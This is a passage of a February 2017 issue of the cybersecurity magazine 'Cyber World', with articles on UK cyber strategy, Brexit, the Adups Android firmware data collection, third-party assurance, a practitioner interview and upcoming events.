entrepreneurial skills required to grow. The two new cyber innovation centres will sit at the heart of this section of the Strategy, giving companies the required assistance to get their first customers and attract further investment. A proportion of the £165m Defence and Cyber Innovation Fund will also be put towards this, as well as the provision of testing facilities for companies to test products. Reassuringly, the Strategy also makes reference to the collective expertise of the Cyber Growth Partnership (CGP) that techUK continues to provide the secretariat for in order to focus further growth and innovation interventions.

The Government will also support the creation of a growing cyber security sector, helping UK companies and academics develop the commercial and

On the topic of cyber security skills, the strategy sets out a long term skills project that builds on existing work to integrate cyber security into the curriculum

FEBRUA RY 2 017

48


so that everyone studying computer science, technology or digital skills will learn the fundamentals of cyber security. This effort will also attempt to address the gender imbalance in cyber professions as well as people from more diverse backgrounds and will be spearheaded by a cyber skills advisory group made up of government, employers, professional bodies, and education providers. INTERNATIONAL ACTION Finally, the strategy recognises the importance of co-operation with international partners on cyber related issues. This includes an assurance that international law and human rights apply in cyberspace, a commitment to a multi-stakeholder model of internet governance, an opposition to data localisation and working towards the raising of cyber security capacity within partner countries. A large proportion of this section focuses on helping other countries develop and maintain their own cyber security, building their capacity to tackle cyber threats to the UK.

TECHUK RESPONSE It is reassuring to see that, in its approach to cyber security standards within the digital economy, the Strategy takes an interventionist stance that aims to raise standards across the UK. The Government has admitted that a ’market approach’ to the promotion of basic cyber security hygiene has in the past not produced the required pace and scale of change, with take up of initiatives such as Cyber Essentials having been low. It is true that the market is not valuing and managing cyber risk correctly and techUK therefore welcomes the recognition that businesses need to ‘up their game’ in regards to cyber security. The Government has a role to ‘set the pace’ and lead the way by bringing its influence and resources to bear to address cyber threats, though it cannot do this alone. The strategy is also a lot clearer, for the first time, about the nation state cyber threats facing the UK and more confident and aggressive in its response to such threats. Whilst it could be argued that the strategy is too broad in certain areas, it is still good to see the Government aiming high and trying to ensure that the UK is a safer place to conduct digital business (though it will be difficult to cover all of the initiatives announced in a fiveyear plan). One criticism, however, is the lack of recognition within the Strategy that much of the world’s innovation in cyberspace comes from the US and increasingly the Far East. The Government should commit more heavily to engaging with innovators around the world, which will in turn help UK companies grow. Overall, the Strategy is a robust and comprehensive response from Government to the growing cyber threats that we face. It is now time for businesses across the country to step up and play their part in keeping their businesses and the UK as a whole secure.

49

C Y BER WORLD


“

It is reassuring to see that, in its approach to cyber security standards within the digital economy, the Strategy takes an interventionist stance that aims to raise standards across the UK.

FEBRUA RY 2 017

50


Secgate Technologies Fast Intelligent Protection At Secgate Technologies we deliver information technology and intelligence solutions that both strengthen and empower our clients’ IT security and resilience. Our tools give clients technology capabilities that allow them to analyse, correlate, identify and eliminate threats. We are industry experts and leading technologists who have built a suite of solutions with proven defensive capabilities that tackle IT threat detection, analytics and IT incident response. Our flagship product, Forest Tree, has been successfully deployed in a number of complex and unique environments. Part of the specialist advisory group Secgate, our clients include large enterprises, governments and SMEs.

www.secgate.co.uk/technologies



Rising Star Siming Wei

53

C Y BER WORLD


Rising Star is a new featured section of Cyber World. With our monthly interviews we introduce our Readers to a promising rising star in the Cyber Security Industry. We want to learn about what motivates these future leaders in the world of cyber, about their background, personal and professional development, specialisations and interests, as well as their goals for the future. And we also ask them to offer some advice for the benefit of the next generation interested in entering careers in this fast-growing industry.

Siming Wei is a Cyber Security Senior Associate at PwC. She joined PwC after completing a master’s degree in Wireless and Optical Communications. Siming has also achieved a first class degree in Electrical Engineering. She is currently studying parttime for a second master’s degree in Information Security at the Royal Holloway University.

Please tell us a bit more about yourself.

doing some research on cyber security, I decided it is a very interesting field that offers a promising career.

I joined the PwC Cyber Security Practice in 2014 after completing a master’s degree in Wireless and

What are the greatest positives about working in

Optical Communications. Over the past two and half

Cyber Security?

years, I have really delved into the exciting world of cyber security, working on a variety of projects in

Cyber security as an industry is constantly growing and

areas ranging from information security management

evolving with the rapid advance of new technologies.

to identity access management across a number of

Therefore, the work is never boring and no two days

industries.

are the same. Gaining exposure to different problems clients are facing and helping them solve these problems

What made you choose a career in Cyber Security?

has been a very rewarding experience. Cyber security is becoming much more important to business, and thus

Making things happen and making things better

it is a great pleasure to take part in shaping the cyber

always give me a great sense of satisfaction. This was

security world to enable business growth. It is exciting

the driving force for me behind choosing a degree in

to work in a very diverse team of people from different

engineering. With the inspiration to encourage more

of backgrounds here at PwC. The amazing people I

young people and especially girls to study STEM

work with help me to learn new things every day.

subjects, I became a STEM ambassador at University. This is where I encountered cyber security for the first

What are the greatest challenges in Cyber Security?

time. Thanks to the IT-related modules in my degree, I was able to understand more about information

Over the past few years, a few high-profile security

technology and started to pay more attention to news

incidents

concerning information security. Upon my graduation,

organisations to wake up to the importance of cyber

and being attracted by the PwC brand, I went on the

security. We have seen quite a lot of organisations

graduate recruitment website and found that they

starting to seriously invest in cyber security. However,

were recruiting graduates for cyber security roles. I

according to the Global State of Information Security

always wanted to work in the technology field, so after

Survey 2016, insider threats are still the top risk to

FEBRUA RY 2 017

have

caused

both

individuals

and

54


organisations. Building the right culture to encourage employees to be secure is the biggest challenge. Organisations must realise that only investing in technologies will not be sufficient to improve the organisational information security posture. People, processes and technologies should all be considered when building and improving their information security capability overall. What are the highlights of your career? Joining PwC has been the biggest change in my life and is definitely a highlight in my career. The great opportunities and enormous support I received from the firm and colleagues have really helped me to learn and develop as a cyber security professional. Another highlight of my career has been working on the Cyber Security Challenge Masterclass 2016, which is the culmination of a national competition programme to identify new cyber security talent and was this year designed and hosted by PwC. It is run by the Cyber Security Challenge UK, a non-profit organisation backed by the government and industry bodies. The event itself has helped to raise awareness in society, and encourage people – especially young people – to work in cyber security. It was an amazing experience to project manage this high profile event and to be involved from the beginning to the end in game design, event management, marketing and PR for more than 6 months. Where do you see Cyber Security in 10 years? With the constantly changing landscape of threats, I believe that cyber security in 10 years will be very different from today. The Internet of Things, the Cloud and other new internet-based technologies, while introducing great convenience and productivity to our lives, can introduce new risks to cyber security and privacy. Cyber security practitioners and law enforcement agencies will need to respond to new challenges. With GDPR coming into force in 2018, organisations are required to do more to demonstrate they can safeguard the information they are handling. In 10 years, new regulations and industrial standards 55

C Y BER WORLD


“

Joining PwC has been the biggest change in my life and is definitely a highlight in my career.

FEBRUA RY 2 017

56


may be created to address cyber security in new

build a good understanding of different areas in cyber

technologies such as drones, driverless cars and

security before choosing my areas of expertise. With

smart homes.

the rapid advances in technology, there will be so many new risks to be mitigated and new assets to be

What are your career ambitions?

protect in cyber security in 5-20 years. Therefore, I want to keep an open mind and be the best I can when

Since cyber security is such a broad topic, it is

opportunities arise.

very difficult to be an expert in all areas. With my experience growing, I would like to become a ‘go to’

What would you do if you were not a consultant?

person in a specific field of cyber security to solve some of the important problems in society. As I am

I would probably be an electrical engineer in the

still at the early stage of my career, I would like to

renewable and green energy sector. I would love to use

57

C Y BER WORLD


the knowledge and the problem solving skills I acquired

valued in cyber security. We have a very diverse team

through my degree to tackle energy shortage and the

here in PwC and we value the different backgrounds

pollution that comes with electricity generation.

and skills each individual brings to the team. Entering a career in cyber security will open up

What advice would you give young people hoping to

opportunities in many areas and on a wide range of

enter a career in the field?

issues. There are so many areas you can go into such as penetration testing, digital forensics and information

My advice for young people is to study what you are

security governance. You can explore and specialise in

really passionate about and interested in. Follow your

the area you are interested in the most. All you need is

heart instead of your peers. Whatever you choose to

to be open minded and ready to learn.

study, the skills you developed are transferable and

FEBRUA RY 2 017

58


Brexit could deal blow to UK’s Cyber Security Chris Luenen

About the Author: Chris Luenen is an experienced international security expert with over 10 years experience working in political foundations, academia and think tanks. He has worked with leaders in financial services institutions, industry and international organisations as well as senior politicians, journalists and academics. The outcome of the recent referendum on the question of Britain’s membership in the European Union has many important implications. These range from the exact modalities of Britain’s future relationship with the EU and other EU-member states, the free movement of labour on the continent, the continued stability of the UK housing market, financial services sector and the overall economy to the question of the very future of Great Britain, and especially Scotland’s role in the Union. While many commentators have rightly pointed out that a very much under-appreciated aspect of Brexit concerns security, the issue of cyber security deserves particular attention in this context. In our increasingly interconnected world, cyber security concerns everyone, from states, large corporations,

59

SMEs to individuals, and attacks and security breaches are on the rise worldwide. The number and severity of breaches recorded are unprecedented, and the culprits are diverse, including the youthful hacker out of his parent’s basement, criminal gangs, hacktivists, terrorists to state-sponsored hackers. The implications of a possible Brexit with regard to cyber security do not just touch on questions of the UK’s national security, but also on the continued competitiveness of the UK’s booming cyber security industry, one of the few remaining growth markets in a depressed global economy, as well as on the competitiveness and security of non-cyber related industries and services.

C Y BER WORLD


IMPACT OF A BREXIT ON

or initiative, a full Brexit will at the very least mean

THE UK’S CYBER SECURITY INDUSTRY

that Britain will no longer have a say in devising any directives and policies the EU develops, and which will

Cybercrime is best combated in partnership with others

be implemented across Europe, and may be left having

and by establishing strong and resilient cooperative

to play catch up after the fact.

mechanisms for doing so, and the EU has done much in recent years to raise the level of, and harmonise, cyber security capabilities, regulations, information sharing and cooperation, and facilitate best practice, across the continent. As Britain’s future relationship with the EU remains uncertain, in the coming months and years it will have to redefine several aspects of a relationship that has previously been taken for granted. This will include a decision on its future relationship with the European Crime Centre (EC3) and Europol as well as with the European Union Agency for Network and Information Security (ENISA) and the newly created European Cyber Security Organisation. Irrespective of the specific details of its continued engagement with any individual EU agency, network

A particular uncertainty in this context relates to the adoption of the EU’s General Data Protection Regulation (GDPR) and the Data Protection Act (DPA). While these regulations will come into effect before the UK potentially departs from the EU, there will be no obligation for the UK to uphold these regulations thereafter. Should the UK decide not to uphold these regulations, then it will become much more difficult, and costly, for UK companies to continue to do business in the EU on par with their European partners and competitors, and demonstrate compliance with its regulations and norms. Similarly, it is uncertain whether the UK will adopt the new directive on security of network and information systems (NIS), which was adopted throughout the European Union in August.

FEBRUA RY 2 017

60


SHORTAGE OF CYBER PROFESSIONALS

an estimated shortage of 1.5 million cyber security

SET TO BECOME WORSE

professionals over the next five years, and new talent is not easy to come by. If travel restrictions were

While an argument could be made that the United

imposed, it would be significantly less attractive for

Kingdom might currently be ahead of its European

talent to come and work, and build a career, in the UK.

partners with regard to its overall cyber security posture and measures, this advantage is set to wane as

LOSING ACCESS TO EU INVESTMENT

the UK’s pool of talented cyber security professionals diminishes over time – a very real prospect should the

Yet another way in which the United Kingdom will find

UK decide to end, or restrict in any meaningful way, the free movement of labour between the UK and EU member states. According to Diane Miller of Northrop Grumman, a

itself affected by a Brexit is through the loss of access

leading expert on the cyber profession, there is already 61

to the EU’s substantially increased investments into cyber security in recent years. Leaving the European Union will cut the United Kingdom off from the Union’s funding streams for cyber security initiatives,

C Y BER WORLD


companies, and technologies, including the recently announced, and major, Public Private Partnership (PPP) programme, which is set to raise an expected €1.8bn of investment in cyber security. When combined with the potential drop in the cyber security talent pool that the United Kingdom might experience in the years ahead, the loss of

these advantages and funding streams will deal a big blow to the overall health and viability of the cyber security industry in Britain, and is unlikely to be

Yet another way in which the United Kingdom will find itself affected by a Brexit is through the loss of access to the EU’s substantially increased investments into cyber security in recent years.

compensated by investments from the UK government and private sectors.

FEBRUA RY 2 017

62


CONCLUSION

The future relationship between Britain and the EU, or even the trajectory for how Britain will seek to extricate

How vulnerable we have all become to cyber crime

itself from the EU and revise, rewrite or create new

should be clear at least since the US National Security

laws, regulations and new mechanisms for cooperation,

Agency’s very own hacker group, the Equation Group,

remain very much uncertain. When considering the

has fallen victim to a substantial security breach, having

potential implications for both the EU’s and the UK’s

been hacked and some of their offensive toolkit of

national, economic and citizens’ personal security, the

exploits and other cyber ‘weapons’ stolen and offered

competitiveness and growth of its respective cyber

for auction, apparently by a previously unknown group

security industries and many related issues, there is not

of hackers calling itself the The Shadow Brokers.

much room for error.

63

C Y BER WORLD


Leron Zinatullin is an experienced risk consultant, specialising in cyber security strategy, management and delivery. He has led large scale, global, high value security transformation projects with a view to improving cost performance and supporting business strategy. He has extensive knowledge and practical experience in solving information security, privacy and architectural issues across multiple industry sectors.

The Psychology Of Information Security In today’s corporations, information security professionals have a lot on their plate. In the face of constantly evolving cyber threats they must comply with numerous laws and regulations, protect their company’s assets and mitigate risks to the furthest extent possible. The Psychology of Information Security redresses the balance by considering information security from both viewpoints in order to gain insight into security issues relating to human behaviour, helping security professionals understand how a security culture that puts risk into context promotes compliance.

Security professionals can often be ignorant of the impact that implementing security policies in a vacuum can have on the end users’ core business activities. These end users are, in turn, often unaware of the risk they are exposing the organisation to. They may even feel justified in finding workarounds because they believe that the organisation values productivity over security. The end result is a conflict between the security team and the rest of the business, and increased, rather than reduced, risk. This can be addressed by factoring in an individual’s perspective, knowledge and awareness, and a modern, flexible and adaptable information security approach. The aim of the security practice should be to correct employee misconceptions by understanding their motivations and working with the users rather than against them – after all, people are a company’s best assets.

FEBRUA RY 2 017

This book draws on the experience of industry experts and related academic research to: • Gain insight into information security issues related to human behaviour, from both end users’ and security professionals’ perspectives. • Provide a set of recommendations to support the security professional’s decision-making process, and to improve the culture and find the balance between security and productivity. • Give advice on aligning a security programme with wider organisational objectives. • Manage and communicate these changes within an organisation. Based on insights gained from academic research as well as interviews with UKbased security professionals from various sectors, The Psychology of Information Security – Resolving conflicts between security compliance and human behaviour explains the importance of careful risk management and how to align a security programme with wider business objectives, providing methods and techniques to engage stakeholders and encourage buy-in.

64


Adups Firmware Vacuuming up Android Phone Data

Back in November, The New York Times reported

Kryptowire discovered by accident that a BLU R1 HD

that the security research firm Kryptowire discovered

phone he purchased was connecting to IP addresses

that ‘several models’ of Android phones were shipped

at adups.com and other domains. So he conducted

with firmware installed that vacuumed up text

further analysis and found out that the phone was

messages, location data, IMEI, contacts, and then

transmitting data in JSON format using a REST web

send this information to a server in Shanghai every

service call. He then investigated what data the phone

72 hours, without the owner’s knowledge or consent.

was transmitting.

The firmware also allows the remote installation and execution of code, again without the owner's

Kryptowire says that Adups claims on its website that

knowledge or consent. But there has been no follow up

they have 700 million active devices in the field and

on the story: In particular, the question is whether the

a market share of over 70% in 150 countries. Their

firmware is still on new phones being distributed, and

phones are integrated with 400 wireless carriers. The

on which models exactly? Who is recording this data

phones with the firmware were sold on Amazon and

and why?

Bestbuy. Adups provides software to two Chinese cell phone manufacturers: ZTE and Huawei. But those

The software in question is firmware that helps

stats are only from ‘old’ information and sources. What

mobile carriers do over-the-air updates. The firmware

we do not have is a list of which phones are affected

with the recording features is aimed at the low-end

right now.

Android market. We know that much. A researcher at

65

C Y BER WORLD


Adups also provides big data services to its customers.

Google told Adups to remove any feature that uses

Obviously the question poses itself whether this is a

Google Play Services. But Google does not operate in

Chinese government effort to spy on its citizens or

China – Google Play is used by Android programmers

just bad planning by the manufacturer. The New York

to do things like integrate with Google Maps and share

Times quoted Adups as saying that the software was

objects. But it is not required to write an Android app

written ‘at the request of an unidentified Chinese

and this firmware is not an Android app, but firmware,

manufacturer’ and that the company wanted the data

meaning software programmed at a level below the

for customer support and to block spam calls and texts.

OS. So Android would not have access. And Google’s

The New York Times wrote: ‘The American authorities

action would have changed nothing.

say it is not clear whether this represents secretive data mining for advertising purposes or a Chinese

So the obvious conclusion is that there are phones out

government effort to collect intelligence.’

there still vacuuming up data and sending it to AdUps in Shanghai. How many of these are in the USA or

The Adups attorney responded by stating that ‘this is a

Europe is impossible to know for sure. We have no list.

private company that made a mistake.’

And Kryptowire only tested one phone.

Kryptowire only tested one phone. And Huawei or ZTE

Tom Karygiannis, VP of Products, stated: ‘I am pretty

have not produced a list of which phones have this

sure they are in the Chinese market. There are more

version of the firmware installed. BLU is an American

devices that I am sure they have it. But we would have

company and has already removed the firmware.

to test it in our labs to know.’

FEBRUA RY 2 017

66


Third Party Assurance: Why bother?

67

C Y BER WORLD


Haydn Brooks, Manager at Secgate Ltd.

ABSTRACT Companies, large and small, rely heavily on their supply chain to run their business. As the number of third parties with access to company and customer data increases, so does the risk of security breaches that have the ability to damage the reputation and sustainability of the business. Third party assurance services can reduce these risks by developing governance and monitoring processes that ensure third parties are managing your data and their own risk appropriately. With threats constantly evolving, the need for a quality third party assurance service is increasing. INTRODUCTION Third party risk management is expensive. It involves performing security reviews of companies that don’t want to be (and don’t have the time to be) reviewed. To be successful it requires input from your procurement, legal, information security and internal audit teams and in order to add any real business value it has to be integrated into a process that produces a real and tangible business outcome. C-level executives have enough on their plate worrying about risks to their own business, let alone other people’s businesses. So why bother? The reasons are the same reasons that we hear time and time again. Operational, reputational, financial and, if your business sits within the financial sector, compliance risk. In short, a failure of one of your third parties will cost you money, clients and time. At Secgate we like to visualise each one of these four risks by placing them into two main categories – risks to your company’s confidentiality (the ability to protect your customer’s data and your business's intellectual property) and risks to your company’s availability (the

Customers therefore trust you, the custodian of their data to keep it personal. ability of your company to maintain the service it provides to its clients). CONFIDENTIALITY Customers have to hand out a massive amount of personally identifiable information in order to do anything in this day and age. They therefore trust you, the custodian of their data to keep it personal. A data breach at one of your suppliers, whether it be a supplier that handles customer credit card information or purely a marketing agency that handles customer names and phone numbers, will erode the trust your customers have in your business. And this will occur whether or not the breach was malicious or accidental. It will make customers think twice about handing over their personal information to you in the future, and this trust will take time to repair and rebuild. This loss of trust in your business and brand is, in essence, reputational damage. Damaged brands don’t do well. Think 2013 and Target’s data breach. Target’s stock price dropped by approximately 10% in the time after the breach was announced, all because of a third party HVAC (heating, ventilation and air conditioning) supplier that you probably can’t name (I know I can’t). Could your business recover from a hit of that magnitude to its bottom line? AVAILABILITY Outsourcing is one of the most popular pastimes of businesses in this day and age. Entire consultancies specialise in helping companies outsource pretty much any function they have, from HR through to payroll and IT. Companies are even outsourcing their C-suite executives.

FEBRUA RY 2 017

68


And you trust these companies to be able to maintain the same quality and availability that you would come to expect of an in house service. And why shouldn’t you trust them, that’s the service you are paying for. But what happens when something happens that means these companies can longer operate? This category is wider than information security. What happens when the supplier managing your help desk is hit by a flash flood? But that could never happen, could it? Just remember that an inch of snow can bring London to a standstill. Could your company operate without its payroll function? Could your company operate without an IT help desk, or even worse, without any IT capability at all? It’s at times like these that strong business continuity and IT disaster recovery (BC/ITDR) plans become a lifesaver. But why should your company have to invoke a business continuity plan and absorb

69

the associated cost, isn’t that the job of the company that suffered the incident? Ensuring that your suppliers have a strong, robust and well thought out business continuity and ITDR capability will reduce the chance that your company ever has to invoke its own business continuity plan, preventing operational and financial impacts and mitigating both operational and financial risk. SO THIS IS ABOUT TRUST? No. Third party assurance is not about your company not trusting its suppliers. It’s about collaboration. It’s about the sharing of best practice. It’s about saying that no matter how mature your information security control environment is, let's help each other to improve it. And it’s this constant improvement that helps create a robust and resilient economy that can benefit everyone.

C Y BER WORLD


FINE, YOU HAVE MY ATTENTION. SO WHAT CAN I DO? Firstly, you need to ensure that your company knows what it is dealing with. Do you have a comprehensive third party inventory? Do you know what third parties you use, the service each one of those third parties provides and the data that they take from you to provide it? Does your CISO team talk to your procurement team to get this information? Does your procurement team even have the information? Secondly, you need to focus your attention on the suppliers that matter most. Rank your suppliers in order of importance from both a confidentiality and an availability perspective. A supplier may be supercritical when looking at them through a confidentiality lens, but bottom of the pile from an availability lens and thus should be reviewed appropriately. Your CISO team cannot do this alone. Your procurement and supplier management teams have to be involved.

Thirdly, implement a third party assurance programme. Look at the controls you have in place to mitigate the risk third parties present to your business. Do your third party contracts contain the required clauses (this will involve speaking to your legal team)? Do you check that third parties maintain their information security control environment? Do you check that your third parties are robust enough to recover from incidents and business continuity issues? Combine the criticality of the third parties with the results from your third party assurance program to measure the risk the third party poses to your business. Make the assumption that a strong third party review means a low risk of an incident occurring at the third party and combine the two into your businesses central risk framework. Finally compare this risk to your risk appetite – are you happy with the risk posed by the third parties that your company utilises?

FEBRUA RY 2 017

70


Cyber World Missed an edition? Want to subscribe? Want a hardcopy? Want to contribute? Contact us on cyber@secgate.co.uk

71

C Y BER WORLD


Upcoming Events RSA CONFERENCE USA hosted in San Francisco US from the 13th to the 17th of February 2017

WORLD CYBER SECURITY CONGRESS 2017 hosted in London, UK from the 7th to the 8th of March 2017

EUROPEAN INFORMATION SECURITY SUMMIT 2017 (TEISS) hosted in London, UK from the 21th to the 22nd of February 2017

CYBER INTELLIGENCE ASIA hosted in Kuala Lumpur, Malaysia from the 14th to the 16th of March 2017

SC CONGRESS LONDON 2017 hosted in London, UK on the 23rd February 2017

CYBERUK 2017 hosted in Liverpool, UK from the 14th to the 16th of March 2017 EUROPEAN SMART GRID CYBER SECURITY hosted in London, UK from the 21st to the 23rd of March 2017

FEBRUA RY 2 017

72



Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.